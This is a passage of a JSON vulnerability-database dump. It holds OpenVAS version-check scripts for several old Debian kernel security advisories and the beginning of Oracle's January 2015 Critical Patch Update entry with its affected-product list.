script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.17-mips\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.17\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r4k-ip22\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r5k-ip22\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r3k-kn02\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-r4k-kn04\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mips-tools\", ver:\"2.4.17-0.020226.2.woody2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.4.17\", ver:\"2.4.17-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.17\", ver:\"2.4.17-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mkcramfs\", ver:\"2.4.17-1woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:55", "references": [], "pluginID": "53694", "description": "The remote host is missing an update to kernel\nannounced via advisory DSA 311-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 311-1 (kernel)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0127", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53694", "id": "OPENVAS:53694", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_311_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 311-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A number of vulnerabilities have been discovered in the Linux kernel.\n\nFor a more detailed description of the problems addressed,\nplease visit the referenced security advisory.\n\nThis advisory covers only the i386 (Intel IA32) architectures. Other\narchitectures will be covered by separate advisories.\n\nFor the stable distribution (woody) on the i386 architecture, these\nproblems have been fixed in kernel-source-2.4.18 version 2.4.18-9,\nkernel-image-2.4.18-1-i386 version 2.4.18-8, and\nkernel-image-2.4.18-i386bf version 2.4.18-5woody1.\n\nFor the unstable distribution (sid) these problems are fixed in the\n2.4.20 series kernels based on Debian sources.\n\nWe recommend that you update your kernel packages.\n\nIf you are using the kernel installed by the installation system when\nthe 'bf24' option is selected (for a 2.4.x kernel), you should install\nthe kernel-image-2.4.18-bf2.4 package. If you installed a different\nkernel-image package after installation, you should install the\ncorresponding 2.4.18-1 kernel. You may use the table below as a\nguide.\n\n* If 'uname -r' shows: * Install this package:\n- ------------------------------------------------------\n* 2.4.18-bf2.4 * kernel-image-2.4.18-bf2.4\n* 2.4.18-386 * kernel-image-2.4.18-1-386\n* 2.4.18-586tsc * kernel-image-2.4.18-1-586tsc\n* 2.4.18-686 * kernel-image-2.4.18-1-686\n* 2.4.18-686-smp * kernel-image-2.4.18-1-686-smp\n* 2.4.18-k6 * kernel-image-2.4.18-1-k6\n* 2.4.18-k7 * kernel-image-2.4.18-1-k7\n\nNOTE: that this kernel is not binary compatible with the previous\nversion. For this reason, the kernel has a different version number\nand will not be installed automatically as part of the normal upgrade\nprocess. Any custom modules will need to be rebuilt in order to work\nwith the new kernel. New PCMCIA modules are provided for all of the\nabove kernels.\n\nNOTE: A system reboot will be required immediately after the upgrade\nin order to replace the running kernel. Remember to read carefully\nand follow the instructions given during the kernel upgrade process.\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory DSA 311-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20311-1\";\n\nif(description)\n{\n script_id(53694);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:36:24 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2002-0429\", \"CVE-2003-0001\", \"CVE-2003-0127\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0364\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 311-1 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-386\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-586tsc\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-686\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-686-smp\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-k6\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-1-k7\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-386\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-586tsc\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-686\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-686-smp\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-k6\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-1-k7\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-386\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-586tsc\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-686\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-686-smp\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-k6\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-pcmcia-modules-2.4.18-1-k7\", ver:\"2.4.18-8\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.18-bf2.4\", ver:\"2.4.18-5woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.18-bf2.4\", ver:\"2.4.18-5woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.4.18\", ver:\"2.4.18-9\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.18\", ver:\"2.4.18-9\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.4.18-bf2.4\", ver:\"3.1.33-6woody1k5woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:22", "references": [], "pluginID": "53142", "description": "The remote host is missing an update to kernel-patch-2.4.17-s390, kernel-image-2.4.17-s390\nannounced via advisory DSA 442-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 442-1 (kernel-patch-2.4.17-s390, kernel-image-2.4.17-s390)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0248", "CVE-2003-0961", "CVE-2003-0247", "CVE-2002-0429", "CVE-2003-0985", "CVE-2003-0364", "CVE-2003-0001", "CVE-2003-0246", "CVE-2003-0244", "CVE-2004-0077"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53142", "id": "OPENVAS:53142", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_442_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 442-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several security related problems have been fixed in the Linux kernel\n2.4.17 used for the S/390 architecture, mostly by backporting fixes\nfrom 2.4.18 and incorporating recent security fixes. \n\nFor a more detailed description of the problems addressed,\nplease visit the referenced security advisory.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 2.4.17-2.woody.3 of s390 images and in version\n0.0.20020816-0.woody.2 of the patch packages.\n\nFor the unstable distribution (sid) these problems will be fixed soon.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\";\ntag_summary = \"The remote host is missing an update to kernel-patch-2.4.17-s390, kernel-image-2.4.17-s390\nannounced via advisory DSA 442-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20442-1\";\n\nif(description)\n{\n script_id(53142);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0001\", \"CVE-2003-0244\", \"CVE-2003-0246\", \"CVE-2003-0247\", \"CVE-2003-0248\", \"CVE-2003-0364\", \"CVE-2003-0961\", \"CVE-2003-0985\", \"CVE-2004-0077\", \"CVE-2002-0429\", \"CVE-2002-0429\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 442-1 (kernel-patch-2.4.17-s390, kernel-image-2.4.17-s390)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.4.17-s390\", ver:\"0.0.20020816-0.woody.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.17\", ver:\"2.4.17-2.woody.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-s390\", ver:\"2.4.17-2.woody.3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:44", "references": [], "pluginID": "53122", "description": "The remote host is missing an update to kernel-image-2.4.17-ia64\nannounced via advisory DSA 423-1.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 423-1 (kernel-image-2.4.17-ia64)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0961", "CVE-2003-0461", "CVE-2003-0985", "CVE-2003-0127", "CVE-2003-0001", "CVE-2003-0501", "CVE-2003-0552", "CVE-2003-0476", "CVE-2003-0462", "CVE-2003-0018", "CVE-2003-0551", "CVE-2003-0550"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=53122", "id": "OPENVAS:53122", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_423_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 423-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The IA-64 maintainers fixed several security related bugs in the Linux\nkernel 2.4.17 used for the IA-64 architecture, mostly by backporting\nfixes from 2.4.18. The resolved issues are identified by the appropriate\nCVE identifiers:\n\nCVE-2003-0001, CVE-2003-0018, CVE-2003-0127, CVE-2003-0461\nCVE-2003-0462, CVE-2003-0476, CVE-2003-0501, CVE-2003-0550\nCVE-2003-0551, CVE-2003-0552, CVE-2003-0961, CVE-2003-0985\n\nFor a more detailed description of the problems addressed,\nplease visit the referenced security advisory.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion kernel-image-2.4.17-ia64 for the ia64 architecture. Other\narchitectures are already or will be fixed separately.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith newly uploaded packages.\";\ntag_summary = \"The remote host is missing an update to kernel-image-2.4.17-ia64\nannounced via advisory DSA 423-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20423-1\";\n\nif(description)\n{\n script_id(53122);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2003-0001\", \"CVE-2003-0018\", \"CVE-2003-0127\", \"CVE-2003-0461\", \"CVE-2003-0462\", \"CVE-2003-0476\", \"CVE-2003-0501\", \"CVE-2003-0550\", \"CVE-2003-0551\", \"CVE-2003-0552\", \"CVE-2003-0961\", \"CVE-2003-0985\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 423-1 (kernel-image-2.4.17-ia64)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.17-ia64\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.17-ia64\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-itanium\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-itanium-smp\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-mckinley\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-mckinley-smp\", ver:\"011226.15\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2018-08-31T04:13:47", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle has received specific reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply these Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 169 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\nPlease note that on October 16, 2014, Oracle released information for [CVE-2014-3566 \"POODLE\"](<http://www.oracle.com/technetwork/topics/security/poodlecve-2014-3566-2339408.html>). Customers of affected Oracle products are strongly advised to apply the fixes and/or configuration steps that were announced for CVE-2014-3566 in addition to the fixes announced in this CPU.\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "edition": 3, "reporter": "Oracle", "published": "2015-03-10T00:00:00", "title": "Oracle Critical Patch Update - January 2015", "type": "oracle", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Oracle HCM Configuration Workbench", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.3", "operator": "le"}, {"name": "Oracle iLearning", "version": "6.1", "operator": "le"}, {"name": "MICROS Retail", "version": "3.4.2", "operator": "le"}, {"name": "OJVM", "version": "12.1.0.2", "operator": "le"}, {"name": "Siebel Core EAI", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.4", "operator": "le"}, {"name": "Siebel Public Sector", "version": "8.1.1", "operator": "le"}, {"name": "OJVM", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.1", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Forms", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.2", "operator": "le"}, {"name": "Workspace Manager", "version": "12.1.0.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u72", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.3", "operator": "le"}, {"name": "Java SE", "version": "5.0u75", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.3", "operator": "le"}, {"name": "Workspace Manager", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle OpenSSO", "version": "8.0", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.1", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.20", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.4", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.1.0.7", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "27.8.4", "operator": "le"}, {"name": "Oracle Forms", "version": "11.1.2.2", "operator": "le"}, {"name": "SPARC Enterprise M3000, M4000, M5000, M8000, M9000 Servers", "version": "1118", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "6u85", "operator": "le"}, {"name": "Java SE", "version": "8u25", "operator": "le"}, {"name": "Oracle Enterprise Asset Management", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Enterprise Asset Management", "version": "8.1.1", "operator": "le"}, {"name": "Fujitsu M10-1, M10-4, M10-4S Servers", "version": "2240", "operator": "le"}, {"name": "Oracle Reports Developer", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.3", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.6", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u71", "operator": "le"}, {"name": "Oracle Healthcare Master Person Index", "version": "1.x", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.1.5", "operator": "le"}, {"name": "Siebel Core - Server OM Services", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "10.1.3.5.0", "operator": "le"}, {"name": "MICROS Retail", "version": "6.0.6", "operator": "le"}, {"name": "Oracle Real-Time Decision Server", "version": "11.1.1.7", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.3.", "operator": "le"}, {"name": "Oracle Marketing", "version": "11.5.10.2", "operator": "le"}, {"name": "Java SE", "version": "6u85", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.4", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.1", "operator": "le"}, {"name": "Oracle Real-Time Decision Server", "version": "3.0.x", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.3", "operator": "le"}, {"name": "Solaris", "version": "11", "operator": "le"}, {"name": "Recovery", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.63", "operator": "le"}, {"name": "Oracle WebCenter Content", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.34", "operator": "le"}, {"name": "Siebel Core - Common Components", "version": "8.2.2", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "11.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.28", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "11.5.10.2", "operator": "le"}, {"name": "Siebel Core - Server BizLogic Script", "version": "8.1.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded, 